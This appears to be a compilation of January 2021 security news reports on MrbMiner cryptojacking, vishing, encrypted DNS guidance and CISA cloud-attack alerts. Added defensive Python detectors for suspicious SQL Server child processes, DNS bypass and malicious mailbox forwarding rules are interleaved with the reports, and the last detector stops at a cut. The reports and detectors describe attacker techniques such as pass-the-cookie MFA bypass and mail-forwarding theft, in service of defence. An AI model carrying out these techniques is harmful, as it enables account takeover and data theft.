Once downloaded onto the system, the cryptominer payload and configuration files are unpacked. A Microsoft SQL server (sqlservr.exe) process first launches a file called assm.exe, which is a trojan that serves as a downloader. Assm.exe then downloads the cryptominer payload from a web server, and connects to its command-and-control (C2) server to report the successful download and execution of the miner.
“In most cases, the payload was a file named sys.dll, which (despite its file suffix) was not a Windows DLL but a zip archive containing a cryptominer binary, configuration file, and related files,” said researchers.
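Two defender-side checks follow from the infection chain just described: the SQL Server process (sqlservr.exe) should not be spawning a downloader, and a "DLL" that is really a zip archive is detectable from its first bytes. This is an added example, not Sophos code; the process-creation events, file contents and allow-list are constructed.

```python
"""Two defender-side checks for the MrbMiner chain described above.

Added example, not Sophos code. (1) The chain starts with sqlservr.exe
launching a downloader, so flag unexpected child processes of the SQL Server
service. (2) The payload was a zip archive named sys.dll, so classify files
by their magic bytes instead of trusting the suffix. Process events and file
contents below are constructed for this example.
"""
import io
import zipfile

PE_MAGIC = b"MZ"                              # DOS header of every PE image
ZIP_MAGICS = (b"PK\x03\x04", b"PK\x05\x06")   # local file header / empty archive

# Children the SQL Server service normally creates; tune per estate, since
# xp_cmdshell, SQL Agent jobs or CLR assemblies may legitimately spawn more.
EXPECTED_SQL_CHILDREN = {"conhost.exe", "sqldumper.exe"}


def file_kind(data: bytes) -> str:
    """Classify a blob as 'pe', 'zip' or 'unknown' from its leading bytes."""
    if data.startswith(PE_MAGIC):
        return "pe"
    if data.startswith(ZIP_MAGICS):
        return "zip"
    return "unknown"


def suffix_mismatch(name: str, data: bytes) -> bool:
    """True when a file named like a PE (.dll/.exe/.sys) is not a PE image."""
    ext = name.lower().rsplit(".", 1)[-1]
    return ext in {"dll", "exe", "sys"} and file_kind(data) != "pe"


def zip_members(data: bytes) -> list[str]:
    """List archive members, e.g. to spot a miner binary and its config."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return zf.namelist()


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def suspicious_sql_children(events: list[dict]) -> list[dict]:
    """Return process-creation events where sqlservr.exe spawned something
    outside EXPECTED_SQL_CHILDREN. Each event needs 'parent_image' and
    'image' keys (the shape of a Sysmon/EDR process-create record)."""
    return [
        ev for ev in events
        if _basename(ev["parent_image"]) == "sqlservr.exe"
        and _basename(ev["image"]) not in EXPECTED_SQL_CHILDREN
    ]


# Constructed sample: a "DLL" that is really a zip holding a miner and config.
_buf = io.BytesIO()
with zipfile.ZipFile(_buf, "w") as _zf:
    _zf.writestr("miner.exe", b"MZ" + b"\x00" * 64)
    _zf.writestr("config.json", b'{"pool": "PLACEHOLDER_POOL"}')
FAKE_SYS_DLL = _buf.getvalue()
REAL_DLL_HEADER = b"MZ\x90\x00" + b"\x00" * 60   # truncated genuine PE header

# Constructed process-create events: only the last one should be flagged.
SAMPLE_EVENTS = [
    {"parent_image": r"C:\Windows\System32\services.exe",
     "image": r"C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe"},
    {"parent_image": r"C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe",
     "image": r"C:\Windows\System32\conhost.exe"},
    {"parent_image": r"C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe",
     "image": r"C:\Windows\Temp\assm.exe"},
]

if __name__ == "__main__":
    for ev in suspicious_sql_children(SAMPLE_EVENTS):
        print("sqlservr.exe spawned:", ev["image"])
    if suffix_mismatch("sys.dll", FAKE_SYS_DLL):
        print("sys.dll is really a", file_kind(FAKE_SYS_DLL),
              "containing", zip_members(FAKE_SYS_DLL))
```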
While the attack seemed typical of most cryptominer attacks targeting internet-facing servers, what sets it apart is that the attacker “appears to have thrown caution to the wind about concealing their identity,” said Gabor Szappanos, threat research director with Sophos Labs.
Researchers discovered a slew of records relating to the miner’s configuration, its domains and IP addresses that pointed to a single point of origin: an (unnamed) small software company based in Iran. For instance, one giveaway was that the server used to host the payloads for the campaign also hosted a domain (vihansoft.ir), which is a website tied to the software company.
“We found a reference to the business behind vihansoft.ir in the Persian-language mapping website neshan.org,” said researchers. “Similar to Google Maps or Waze, Neshan includes business information as part of its mapping services, and the entry for a company that lists vihansoft.ir as its website, and names its managing director.”
Researchers noted that cryptojacking may be utilized here by people who live in countries like Iran that are under strict international financial sanctions by the U.S., in order to bypass the traditional banking system.
Servers: Lucrative Cryptojacking Target
While many attackers target computers with their cryptomining malware, researchers stressed that database servers are an attractive target for attackers because they are used for resource-intensive processes and thus contain potent processing capability.
IT administrators hosting a database face significant performance requirements, including the ability to process large loads of data reads and writes, as well as high levels of RAM and processor overhead to respond rapidly to queries, said researchers.
“As a result, servers hosting databases fall on the beefier side of the performance scale, which is why they’re an excellent target for attackers whose goals include the distribution of cryptocurrency miners,” said researchers.
Attackers have caught on to this over the past years. In 2019, up to 50,000 servers were infected as part of a high-profile cryptojacking campaign, believed to have been orchestrated by Chinese-language adversaries. In 2018, MassMiner emerged to target Windows servers with various well-known exploits, all within a single executable — including the EternalBlue NSA hacking tool.
FBI Warns of Employee Credential Phishing via Phone, Chat
19.1.2021 BigBrothers Securityweek
The Federal Bureau of Investigation has issued a Private Industry Notification (PIN) to warn of attacks targeting enterprises, in which threat actors attempt to obtain employee credentials through vishing or chat rooms.
Taking advantage of the COVID-19 pandemic, which has forced the broad adoption of telework, cyber-criminals and threat actors are attempting to exploit possible misconfiguration and lack of monitoring for remote network access and user privileges.
An observed shift in tactics, the FBI says, is the targeting of all employee credentials, not exclusively of those individuals who might have higher access and privileges based on their corporate position.
Cybercriminals were observed employing social engineering to target both US-based and international-based employees of large companies. As part of vishing attacks (voice phishing performed during phone calls) using VoIP platforms, employees were tricked into accessing fake web pages and entering their corporate usernames and passwords.
“After gaining access to the network, many cyber criminals found they had greater network access, including the ability to escalate privileges of the compromised employees’ accounts, thus allowing them to gain further access into the network often causing significant financial damage,” the FBI explains.
In one attack, the Agency says, the cybercriminals found an employee via the company’s chatroom, and then convinced them to log into a fake VPN page, revealing their credentials.
Using the compromised username and password, the threat actors then logged into the company’s VPN and started searching for employees who had higher privileges. They located an employee who could make username and email changes and used a chat room messaging service to phish for their credentials.
The infamous July 2020 Twitter hack, in which three youngsters gained access to the social platform’s internal tools and took control of high-profile accounts, is representative of how such an attack is performed: the cybercriminals called multiple employees to phish for their credentials, until they finally harvested those having the privileges they were looking for.
“The Hackers used personal information about the employees to convince them that the Hackers were legitimate and could, therefore, be trusted. While some employees reported the calls to Twitter’s internal fraud monitoring team, at least one employee believed the Hackers’ lies,” the New York Department of Financial Services said in a report detailing the incident.
To mitigate such attacks, the FBI advises organizations to implement multi-factor authentication (MFA) for employee accounts, adopt the least privilege principle (especially for new employee accounts), actively monitor the environment for unauthorized access or modifications, employ network segmentation, and issue two accounts for admins: one for email and another for making changes to systems.
“With so many people working from home, they are more likely to fall for this type of vishing scam because they don't have the protective environment of being in their corporate offices,” James McQuiggan, security awareness advocate at KnowBe4, said in an emailed comment.
“Organizations want to include vishing exercises within their robust security awareness, behaviors, and culture programs to ensure employees are aware of current dangers and can take the appropriate actions to reduce the risk of an attack by unauthorized people,” McQuiggan continued.
Rob Joyce Appointed Director of Cybersecurity at NSA
19.1.2021 BigBrothers Securityweek
The U.S. National Security Agency on Friday announced that Rob Joyce, an official who is highly respected in the cybersecurity community, has been named the agency’s new director of cybersecurity.
Joyce, who according to his LinkedIn profile has been working for the Defense Department for the past 32 years, replaces Anne Neuberger, who has been appointed Deputy National Security Advisor for Cyber and Emerging Technology by the upcoming Biden administration.
Before taking the role of director of cyber at the NSA, Joyce represented the intelligence agency in the UK, and served as senior adviser to the NSA director on cybersecurity strategy.
Prior to that, he was cybersecurity coordinator in the Trump administration’s National Security Council. Following his departure, the White House announced a controversial decision to eliminate the role of cybersecurity coordinator.
Joyce also served as head of the NSA’s Tailored Access Operations (TAO) hacking unit.
President Biden’s Peloton exercise equipment under scrutiny
18.1.2021 BigBrothers Securityaffairs
President Joe Biden can’t bring his Peloton exercise equipment to the White House due to security reasons.
According to a Popular Mechanics report, President Joe Biden is going to move to the White House and will likely have to give up his Peloton exercise equipment for security reasons.
Peloton exercise equipment’s popularity surged during the pandemic; it allows users to exercise from home while interacting with each other within an online community.
Peloton devices are connected online and are equipped with a camera and microphone that give the users an immersive experience and communications capabilities. On the other side, these features pose a potential risk to the user in case of a hack, and President Joe Biden is a privileged target.
To secure the exercise equipment, Biden’s Peloton may have to be modified, removing the microphone, camera and networking equipment.
“If you really want that Peloton to be secure, you yank out the camera, you yank out the microphone, and you yank out the networking equipment … and you basically have a boring bike,” Max Kilger, Ph.D., director of the Data Analytics Program and Associate Professor in Practice at the University of Texas at San Antonio, told Popular Mechanics. “You lose the shiny object and the attractiveness.”
The case has an important precedent: three years ago, The Verge revealed that a person close to the company confirmed that Michelle Obama had a Peloton, but it was a modified model, without a camera or microphone.
Peloton runs a custom operating system built on top of Android and is equipped with networking hardware to access the user’s home WiFi network or a hard-wired connection, like Ethernet.
“That allows the bike to communicate with your Apple Watch or Fitbit, which are internet-of-things (IoT) devices that contain microphones. If a hacker found a way to infect Biden’s Peloton, then it’s theoretically possible they could hop from the bike to the watch and vice versa,” Kilger added.
Several hacking communities online focus on IoT devices, including the Peloton equipment. The risk is that someone could find a way to compromise the equipment with malware, then move laterally within the host network and compromise any other connected device.
The report pointed out that the Secret Service can take precautions to secure the President’s gym sessions. They could set up the bike in a special gym area where discussing classified topics is not allowed. Another countermeasure is to use a hardwired connection for the President’s Peloton equipment that is separate from the rest of the White House network.
EU Regulator: Hackers ‘Manipulated’ Stolen Vaccine Documents
17.1.2021 BigBrothers Securityweek
The European Union’s drug regulator said Friday that COVID-19 vaccine documents stolen from its servers by hackers have been not only leaked to the web, but “manipulated.”
The European Medicines Agency said that an ongoing investigation showed that hackers obtained emails and documents from November related to the evaluation of experimental coronavirus vaccines. The agency, which regulates drugs and medicines across the 27-member EU, had troves of confidential COVID-19 data as part of its vaccine approval process.
“Some of the correspondence has been manipulated by the perpetrators prior to publication in a way which could undermine trust in vaccines,” the Netherlands-based agency said.
“We have seen that some of the correspondence has been published not in its integrity and original form and, or with, comments or additions by the perpetrators.”
The agency did not explain exactly what information was altered — but cybersecurity experts say such practices are typical of disinformation campaigns launched by governments.
Italian cybersecurity firm Yarix said it found the 33-megabyte leak on a well-known underground forum with the title “Astonishing fraud! Evil Pfffizer! Fake vaccines!” It was apparently first posted on Dec. 30 and later appeared on other sites, including on the dark web, the company said on its website.
Yarix said “the intention behind the leak by cybercriminals is certain: to cause significant damage to the reputation and credibility of EMA and Pfizer.”
Cybersecurity consultant Lukasz Olejnik said he believed the intention was far broader.
“I fear this release has a significant potential of sowing distrust in the EMA process, the vaccines, and vaccination in Europe in general,” he said. “While it is unclear as to who may be behind this operation, it is evident that someone determined allocated resources to it.”
“This is an unprecedented operation targeting the validation of pharmaceutical material, with potentially broad negative effects on the health of Europeans if it leads to undermining trust in the vaccine,” Olejnik added.
The EMA said law enforcement authorities are taking “necessary action” in response to the hack and a criminal investigation is ongoing.
It said that given the devastating toll of the pandemic, there was an “urgent public health need to make vaccines available to EU citizens as soon as possible.” The EMA insisted that despite that urgency, its decisions to recommend the green-lighting of vaccines were based “on the strength of the scientific evidence on a vaccine’s safety, quality and efficacy, and nothing else.”
The EMA, which is based in Amsterdam, came under heavy criticism from Germany and other EU member countries in December for not approving vaccines against the virus more quickly. The agency issued its first recommendation for the Pfizer and BioNTech vaccine weeks after the shot received approval in Britain, the United States, Canada and elsewhere.
The EMA recommended a second vaccine, made by Moderna, for use earlier this month. A third shot made by AstraZeneca and Oxford is currently under consideration by the agency.
NSA Publishes Guidance for Enterprises on Adoption of Encrypted DNS
16.1.2021 BigBrothers Securityweek
The National Security Agency (NSA) on Wednesday published guidance for businesses on the adoption of an encrypted domain name system (DNS) protocol, specifically DNS over HTTPS.
Designed to translate the domain names included in URLs into IP addresses, for easier navigation of the Internet, DNS has become a popular attack vector, mainly because requests and responses are transmitted in plaintext.
DNS over HTTPS, or DoH, aims to address this shortcoming by sending DNS requests over HTTPS, encrypted, and thus protecting traffic between a client and a DNS resolver. DoH improves privacy and integrity, preventing eavesdropping and DNS traffic manipulation, and is enjoying increasing adoption among enterprises.
To ensure they can continue to govern DNS usage within their networks, enterprises need to allow only for a specific DoH resolver to be used. The use of DNS controls within enterprise environments can prevent techniques that threat actors use for initial access, data exfiltration, or command and control.
“Using DoH with external resolvers can be good for home or mobile users and networks that do not use DNS security controls. For enterprise networks, however, NSA recommends using only designated enterprise DNS resolvers in order to properly leverage essential enterprise cybersecurity defenses, facilitate access to local network resources, and protect internal network information,” the NSA notes.
Enterprises can use either their own DNS servers or external services, but support for encrypted DNS requests such as DoH is crucial for ensuring local privacy and integrity protections, NSA notes. The agency also recommends disabling other encrypted DNS resolvers and ensuring that all DNS traffic, encrypted or not, is sent only to the designated enterprise DNS resolver.
“However, if the enterprise DNS resolver does not support DoH, the enterprise DNS resolver should still be used and all encrypted DNS should be disabled and blocked until encrypted DNS capabilities can be fully integrated into the enterprise DNS infrastructure,” the agency explains.
The newly published NSA guidance not only provides information on how DNS and DoH work, but also details the purpose behind the DoH design, as well as why enterprise networks should be appropriately configured to add benefits to DNS security controls.
By applying the provided recommendations, the NSA says, enterprise network owners and admins can balance privacy and governance when it comes to DNS.
NSA Suggests Enterprises Use 'Designated' DNS-over-HTTPS Resolvers
16.1.2021 BigBrothers Thehackernews
The U.S. National Security Agency (NSA) on Friday said DNS over HTTPS (DoH) — if configured appropriately in enterprise environments — can help prevent "numerous" initial access, command-and-control, and exfiltration techniques used by threat actors.
"DNS over Hypertext Transfer Protocol over Transport Layer Security (HTTPS), often referred to as DNS over HTTPS (DoH), encrypts DNS requests by using HTTPS to provide privacy, integrity, and 'last mile' source authentication with a client's DNS resolver," according to the NSA's new guidance.
Proposed in 2018, DoH is a protocol for performing remote Domain Name System resolution via the HTTPS protocol.
One of the major shortcomings of current DNS lookups is that even when someone visits a site that uses HTTPS, the DNS query and its response are sent over an unencrypted connection, allowing a third party eavesdropping on the network to track every website a user visits.
Even worse, the setup is ripe for carrying out man-in-the-middle (MiTM) attacks simply by changing the DNS responses to redirect unsuspecting visitors to a malware-laced site of the adversary's choice.
Thus by using HTTPS to encrypt the data between the DoH client and the DoH-based DNS resolver, DoH aims to increase user privacy and security by preventing eavesdropping and manipulation of DNS data by MiTM attacks.
To that effect, the NSA recommends using only designated enterprise DNS resolvers to achieve the desired cybersecurity defense, while noting that such resolvers will be bypassed completely when a client has DoH enabled and is configured to use a DoH resolver not designated by the enterprise.
The gateway, which is used to forward the query to external authoritative DNS servers in the event the enterprise DNS resolver does not have the DNS response cached, should be designed to block DNS, DoH, and DNS over TLS (DoT) requests to external resolvers and DNS servers that are not from the enterprise resolver, the agency added.
Although DoH protects DNS transactions from unauthorized modification, the NSA cautioned of a "false sense of security."
"DoH does not guarantee protection from cyber threat actors and their ability to see where a client is going on the web," it said. "DoH is specifically designed to encrypt only the DNS transaction between the client and resolver, not any other traffic that happens after the query is satisfied."
"Enterprises that allow DoH without a strategic and thorough approach can end up interfering with network monitoring tools, preventing them from detecting malicious threat activity inside the network, and allowing cyber threat actors and malware to bypass the designated enterprise DNS resolvers."
What's more, the encryption does nothing to prevent the DNS provider from seeing both the lookup requests as well as the IP address of the client making them, effectively undermining privacy protections and making it possible for a DNS provider to create detailed profiles based on users' browsing habits.
Oblivious DNS-over-HTTPS (ODoH), announced last month by engineers at Apple, Cloudflare, and Fastly, aims to address this issue. It prevents the DoH resolver from knowing which client requested which domain names by passing all requests through a proxy that separates the IP addresses from the queries, "so that no single entity can see both at the same time."
Put differently, this means the proxy does not know the contents of queries and responses, and the resolver does not know the IP addresses of the clients.
Secondly, the use of DoH also doesn't negate the possibility that resolvers that communicate with malicious servers upstream could still be susceptible to DNS cache poisoning.
"DNSSEC should be used to protect the upstream responses, but the DoH resolver may not validate DNSSEC," the NSA said. "Enterprises that do not realize which parts of the DNS process are vulnerable could fall into a false sense of security."
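The two NSA write-ups above boil down to one control: every DNS transaction, plain or encrypted, must reach the designated enterprise resolver, and encrypted DNS is blocked outright until that resolver supports it. The following is an added example, not part of the NSA guidance or either article, that applies that policy to constructed flow records: the resolver address, the sample traffic and the list of public DoH hostnames used to spot DoH over port 443 are all assumptions.

```python
"""Flag DNS traffic that bypasses the designated enterprise resolver.

Added example (not from the NSA guidance). Classifies constructed flow
records as plain DNS (53/udp or tcp), DNS over TLS (853/tcp) or DNS over
HTTPS (443/tcp whose TLS SNI names a known public DoH endpoint), then
reports anything that does not terminate at the enterprise resolver.
"""
import csv
from dataclasses import dataclass
from io import StringIO

# Assumption: the enterprise's designated resolver (RFC 1918 address).
DESIGNATED_RESOLVERS = {"10.0.0.53"}

# Sample list of public DoH hostnames used for SNI matching; a real
# deployment would maintain a much longer, curated list.
KNOWN_DOH_HOSTS = {"dns.google", "cloudflare-dns.com", "dns.quad9.net"}

# Constructed flow records (documentation IP ranges, not real traffic).
SAMPLE_FLOWS = """\
# ts,src,dst,proto,dport,sni
2021-01-15T10:00:01Z,10.1.2.3,10.0.0.53,udp,53,
2021-01-15T10:00:02Z,10.1.2.4,198.51.100.8,udp,53,
2021-01-15T10:00:03Z,10.1.2.5,198.51.100.9,tcp,853,
2021-01-15T10:00:04Z,10.1.2.6,203.0.113.1,tcp,443,cloudflare-dns.com
2021-01-15T10:00:05Z,10.1.2.7,203.0.113.2,tcp,443,example.com
2021-01-15T10:00:06Z,10.1.2.8,10.0.0.53,tcp,853,
"""


@dataclass(frozen=True)
class Flow:
    ts: str
    src: str
    dst: str
    proto: str
    dport: int
    sni: str


def parse_flows(text):
    """Parse the CSV flow export; '#' lines are comments."""
    flows = []
    for row in csv.reader(StringIO(text.strip())):
        if not row or row[0].startswith("#"):
            continue
        ts, src, dst, proto, dport, sni = row
        flows.append(Flow(ts, src, dst, proto.lower(), int(dport), sni.strip()))
    return flows


def classify(flow):
    """Return 'dns', 'dot', 'doh' or None for a non-DNS flow."""
    if flow.dport == 53 and flow.proto in ("udp", "tcp"):
        return "dns"
    if flow.dport == 853 and flow.proto == "tcp":
        return "dot"
    if flow.dport == 443 and flow.proto == "tcp" \
            and flow.sni.lower() in KNOWN_DOH_HOSTS:
        return "doh"
    return None


def find_bypasses(flows, designated=DESIGNATED_RESOLVERS,
                  resolver_supports_encrypted=True):
    """Return (flow, kind, reason) for every flow violating the policy.

    Any DNS-like flow to a non-designated destination is a bypass. When the
    enterprise resolver does not yet support DoH/DoT, encrypted DNS even to
    the designated resolver is flagged, matching the NSA's interim advice.
    """
    findings = []
    for f in flows:
        kind = classify(f)
        if kind is None:
            continue
        if f.dst not in designated:
            findings.append((f, kind, "external resolver"))
        elif kind != "dns" and not resolver_supports_encrypted:
            findings.append((f, kind, "encrypted DNS not yet supported by "
                                      "the enterprise resolver"))
    return findings


if __name__ == "__main__":
    for flow, kind, reason in find_bypasses(parse_flows(SAMPLE_FLOWS)):
        print(f"{flow.ts} {flow.src} -> {flow.dst}:{flow.dport} "
              f"[{kind.upper()}] {reason}")
```

SNI matching only catches DoH to resolvers on the list; the NSA's stronger recommendation, blocking all external 53/853 and unlisted DoH at the gateway, does not depend on such a list.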
Cloud Attacks Are Bypassing MFA, Feds Warn
15.1.2021 BigBrothers Threatpost
CISA has issued an alert warning that cloud services at U.S. organizations are being actively and successfully targeted.
The Feds are warning that cybercriminals are bypassing multi-factor authentication (MFA) and successfully attacking cloud services at various U.S. organizations.
According to an alert issued Wednesday by the Cybersecurity and Infrastructure Security Agency (CISA), there have been “several recent successful cyberattacks” focused on compromising the cloud. Most of the attacks are opportunistic, taking advantage of poor cloud cyber-hygiene and misconfigurations, according to the agency.
“These types of attacks frequently occurred when victim organizations’ employees worked remotely and used a mixture of corporate laptops and personal devices to access their respective cloud services,” the alert outlined. “Despite the use of security tools, affected organizations typically had weak cyber-hygiene practices that allowed threat actors to conduct successful attacks.”
For instance, in one case, an organization did not require a virtual private network (VPN) for remote employees accessing the corporate network.
“Although their terminal server was located within their firewall, due to remote work posture, the terminal server was configured with port 80 open to allow remote employees to access it—leaving the organization’s network vulnerable [to brute-forcing],” CISA explained.
The agency also noted that phishing and possibly a “pass-the-cookie” attack have been the primary attack vectors for the cloud attacks.
Phishing and Bypassing MFA
On the phishing front, targets are being sent emails containing malicious links, which purport to take users to a “secure message.” Other emails masquerade as alerts for legitimate file hosting services. In both cases, the links take targets to a phishing page, where they’re asked to provide account credentials. The cybercriminals thus harvest these and use them to log into cloud services.
“CISA observed the actors’ logins originating from foreign locations (although the actors could have been using a proxy or The Onion Router (Tor) to obfuscate their location),” according to the alert. “The actors then sent emails from the user’s account to phish other accounts within the organization. In some cases, these emails included links to documents within what appeared to be the organization’s file-hosting service.”
Meanwhile, attackers have been able to bypass MFA using a “pass-the-cookie” attack. Browser cookies are used to store user authentication information so a website can keep a user signed in. The authentication information is stored in a cookie after the MFA test is satisfied, so the user isn’t prompted for an MFA check again.
Thus, if attackers extract the right browser cookies they can authenticate as a targeted user in a separate browser session, bypassing all MFA checkpoints. As explained in a recent posting from Stealthbits, an attacker would need to convince a user to click on a phishing email or otherwise compromise a user’s system, after which it’s possible to execute code on the machine. A simple command would allow an attacker to extract the appropriate cookie.
“It is important to note that not understanding the weaknesses and potential hacking bypasses of MFA is almost as bad as not using it,” said Roger Grimes, data-driven defense evangelist at KnowBe4, via email. “If you think you’re far less likely to be hacked because of MFA (and that isn’t true), then you are more likely to let your defenses down. But if you understand how MFA can be attacked, and share that with the end users of the MFA and designers of the systems that it relies on, you’re more likely to get a better, less risky outcome. The key is to realize that everything can be hacked. MFA doesn’t impart some special, magical defense that no hacker can penetrate. Instead, strong security awareness training around any MFA solution is crucial, because to do otherwise is to be unprepared and more at risk.”
Exploiting Forwarding Rules
CISA said that it has also observed threat actors, post-initial compromise, collecting sensitive information by taking advantage of email forwarding rules.
Forwarding rules allow users to send work emails to their personal email accounts – a useful feature for remote workers.
CISA said that it has observed threat actors modifying an existing email rule on a user’s account to redirect the emails to attacker-controlled accounts.
“Threat actors also modified existing rules to search users’ email messages (subject and body) for several finance-related keywords (which contained spelling mistakes) and forward the emails to the threat actors’ account,” according to the agency. “The threat actors [also] created new mailbox rules that forwarded certain messages received by the users (specifically, messages with certain phishing-related keywords) to the legitimate users’ RSS Feeds or RSS Subscriptions folder in an effort to prevent warnings from being seen by the legitimate users.”
Cloud Security
Cloud adoption, spurred by pandemic work realities, will only accelerate in the year ahead with software-as-a-service, cloud-hosted processes and storage driving the charge. A study by Rebyc found that 35 percent of companies surveyed said they plan to accelerate workload migration to the cloud in 2021.
Budget allocations to cloud security will double as companies look to protect cloud buildouts in the year ahead, according to Gartner.
“[Companies] by shifting the responsibility and work of running hardware and software infrastructure to cloud providers, leveraging the economics of cloud elasticity, benefiting from the pace of innovation in sync with public cloud providers, and more,” said David Smith, distinguished VP Analyst at Gartner.
Accordingly, cloud applications and environments are increasingly in the sights of attackers. In December for instance, the National Security Agency issued a warning that threat actors have developed techniques to leverage vulnerabilities in on-premises network access to compromise the cloud.
“Malicious cyber-actors are abusing trust in federated authentication environments to access protected data,” the advisory read. “The exploitation occurs after the actors have gained initial access to a victim’s on-premises network. The actors leverage privileged access in the on-premises environment to subvert the mechanisms that the organization uses to grant access to cloud and on-premises resources and/or to compromise administrator credentials with the ability to manage cloud resources.”
CISA warns of recent successful cyberattacks against cloud service accounts
15.1.2021 BigBrothers Securityaffairs
The US CISA revealed that several recent successful cyberattacks have targeted various organizations’ cloud services.
The Cybersecurity and Infrastructure Security Agency (CISA) announced that several recent successful cyberattacks hit various organizations’ cloud services.
According to the agency, the attackers conducted phishing campaigns and exploited poor cyber hygiene practices of the victims in the management of cloud services configuration.
CISA has published a report that includes information collected exclusively from several CISA incident response engagements; these data are extremely valuable because they detail the tactics, techniques, and procedures used by threat actors and indicators of compromise (IOCs). Data in the Analysis Report is not explicitly tied to the supply chain attack on SolarWinds Orion Platform software.
“The cyber threat actors involved in these attacks used a variety of tactics and techniques—including phishing, brute force login attempts, and possibly a “pass-the-cookie” attack—to attempt to exploit weaknesses in the victim organizations’ cloud security practices.” reads the report published by CISA.
The US agency revealed that threat actors bypassed multi-factor authentication (MFA) to compromise cloud service accounts.
Attackers may have used browser cookies to defeat MFA with a “pass-the-cookie” attack (MITRE ATT&CK T1550.004).
Government experts confirmed that the threat actors initially attempted brute force logins on some accounts without success.
At least in one case, the attackers modified or set up email forwarding rules to redirect the emails to an account under their control.
Threat actors also modified existing rules to search users’ email messages (subject and body) for keywords that could allow them to identify messages containing sensitive data (i.e., financial information) and forward them to their accounts.
“In addition to modifying existing user email rules, the threat actors created new mailbox rules that forwarded certain messages received by the users (specifically, messages with certain phishing-related keywords) to the legitimate users’ Really Simple Syndication (RSS) Feeds or RSS Subscriptions folder in an effort to prevent warnings from being seen by the legitimate users,” continues CISA.
The FBI also warned US organizations about scammers abusing auto-forwarding rules on web-based email clients in Business Email Compromise (BEC) attacks.
Last week, the Cybersecurity and Infrastructure Security Agency (CISA) revealed that threat actors behind the SolarWinds supply chain attack also employed common hacker techniques to compromise the networks of the targeted organizations, including password guessing and password spraying.
CISA also added that inappropriately secured administrative credentials accessible via external remote access services were abused by the attackers.
CISA added that it is investigating incidents in which threat actors abused the Security Assertion Markup Language (SAML) tokens.
CISA Warns Organizations About Attacks on Cloud Services
15.1.2021 BigBrothers Securityweek
In light of successful cyberattacks targeting organizations’ cloud services, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) has published a series of recommendations on how businesses can improve their cloud security.
The attacks observed by CISA exploit poor cyber hygiene practices within cloud services configurations, and the agency says the activity is not tied to a specific threat actor or the recent SolarWinds attack. Thus, the recommended mitigations apply to all organizations looking to ensure their cloud services are better protected from cyberattacks.
CISA notes that the recommendations are based on CISA incident response engagements and that the observed attacks frequently involved telework that leveraged a mixture of corporate laptops and personal devices for access to cloud services.
“Despite the use of security tools, affected organizations typically had weak cyber hygiene practices that allowed threat actors to conduct successful attacks,” CISA notes.
To exploit weaknesses in the victim organization’s cloud services, the threat actors used techniques such as phishing and brute force attempts. One incident, however, possibly involved a “pass-the-cookie” attack (in which a stolen session cookie is used to access otherwise restricted resources).
Phishing emails were used to trick victims into sharing their login credentials, and then abuse these to access cloud service accounts and phish for additional credentials. Brute force attempts targeted a terminal server at an organization that opened port 80 for remote access rather than using a VPN.
Email forwarding rules were also abused for the collection of sensitive information, as well as modified rules to search for finance-related keywords within the victims’ email messages. In one case, although the compromised account had proper multi-factor authentication (MFA) enabled, the attackers apparently used a “pass-the-cookie” attack for initial access.
“Cookies establish session persistence for web applications. When you are authenticated with a web application, MFA or not, the cookie is placed on your computer. The cookie contains the session ID and access tokens to the web application. This is so you don’t have to reauthenticate incessantly to the web application. This is an inherent flaw in the HTTP protocol and how web applications work. HTTP is a stateless protocol and relies on cookies to maintain state,” Christian Espinosa, Managing Director at Cerberus Sentinel, explains.
“The way to mitigate the MFA pass-the-cookie vulnerability is with better cookie management and better user training. Specially, cookies should be set with a short lifespan. […] The bottom line is there is no single way to fix the pass-the-cookie problem, unless you force a user to reauthenticate more frequently for different web application functionality. This diminishes the user experience though,” Espinosa continues.
To mitigate cyberattacks targeting their cloud services, organizations are advised to implement conditional access (CA) policies, establish a baseline for normal network activity, review logs, enforce MFA, review user-created email forwarding rules and alerts, establish a mitigation plan, secure privileged access, prohibit personal devices at work (unless necessary), audit email rules, ensure users consent only to app integrations that have been pre-approved, and adopt a zero-trust mindset.
Organizations should also ensure that user access logging is enabled, that legacy authentication protocols are blocked, that Remote Desktop Protocol (RDP) ports are closed on cloud-based virtual machines with public IPs, that employees are trained on how to identify threats and report them, and that detection solutions are up-to-date.
For organizations that use Microsoft 365, only a few (one to three) trusted users should be set as electronic discovery (or eDiscovery) managers, PowerShell remoting to Exchange Online should be disabled for regular M365 users, and only a limited number of unsuccessful login attempts should be allowed, to prevent brute-forcing.
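The three CISA write-ups above describe the same post-compromise pattern: mailbox rules that forward mail to attacker-controlled addresses, rules keyed on misspelled finance terms, and rules that bury phishing warnings in the RSS Feeds or RSS Subscriptions folder. The following is an added example, not CISA's tooling, that audits mailbox rules for those three signs; the rule records, their simplified field names and the organization's domain are constructed, so a real export (Exchange, Microsoft 365 or another mail platform) would first need mapping onto them.

```python
"""Audit mailbox rules for the forwarding abuse CISA describes.

Added example (not from CISA). Flags rules that forward or redirect to
external addresses, rules that match finance-related keywords (including
misspelled ones) and forward them, and rules that move mail into the RSS
folders where users are unlikely to look.
"""

# Assumption: the organization's own mail domains.
ORG_DOMAINS = {"example.com"}

# Folders the CISA report names as a hiding place for warning messages.
HIDE_FOLDERS = {"rss feeds", "rss subscriptions"}

# Constructed finance vocabulary; misspellings are matched by edit distance.
FINANCE_KEYWORDS = {"invoice", "payment", "wire", "transfer", "bank",
                    "payroll", "remittance", "ach"}

# Constructed rule records with simplified field names (not a real export).
SAMPLE_RULES = [
    {"name": "Travel filing",
     "subject_or_body_contains": ["itinerary"],
     "move_to_folder": "Travel"},
    {"name": "Finance",
     "subject_or_body_contains": ["invioce", "wire trnasfer"],
     "forward_to": ["collector@mail-drop.example.net"]},
    {"name": "Clean up",
     "subject_or_body_contains": ["phishing", "suspicious sign-in"],
     "move_to_folder": "RSS Subscriptions"},
    {"name": "Forward to manager",
     "forward_to": ["manager@example.com"]},
]


def osa_distance(a, b):
    """Optimal string alignment distance: edits plus adjacent transpositions,
    so 'trnasfer' is one step from 'transfer'."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
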